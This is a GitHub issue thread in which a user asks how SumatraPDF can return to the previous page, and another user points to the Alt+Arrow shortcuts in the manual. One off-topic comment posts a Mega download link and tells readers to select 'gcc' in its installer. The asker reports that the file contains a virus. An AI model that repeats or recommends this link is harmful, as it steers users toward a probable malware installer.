### ISSUE TITLE
Navigation as web browser

### ISSUE THREAD

**Issue by JosepBalague** [sumatrapdfreader/sumatrapdf#4498]
**Is your feature request related to a problem? Please describe.**
Like any web browser, how to return to the last page visited (very useful for navigating within an index of content)

**Describe the solution you'd like**
![imatge](https://github.com/user-attachments/assets/6e312108-1a4b-41b6-af99-91fdc884b5ae)

**Describe alternatives you've considered**
--

**Additional context**
See below

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by JosepBalague** [comment]
> Download https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU In the installer menu, select "gcc."

This file contains a virus

**Comment by tactilis** [comment]
> Like any web browser, how to return to the last page visited (very useful for navigating within an index of content)

Like any web browser just press Alt + Left Arrow or Alt + Right Arrow.

It's in the well written Manual.
See **Menu** > **Help** > **Manual** > **Scrolling, Zooming, Navigating** > **Navigating history**

**Comment by JosepBalague** [comment]
> > Like any web browser, how to return to the last page visited (very useful for navigating within an index of content)
> 
> Like any web browser just press Alt + Left Arrow or Alt + Right Arrow.
> 
> It's in the well written Manual. See **Menu** > **Help** > **Manual** > **Scrolling, Zooming, Navigating** > **Navigating history**

Thanks
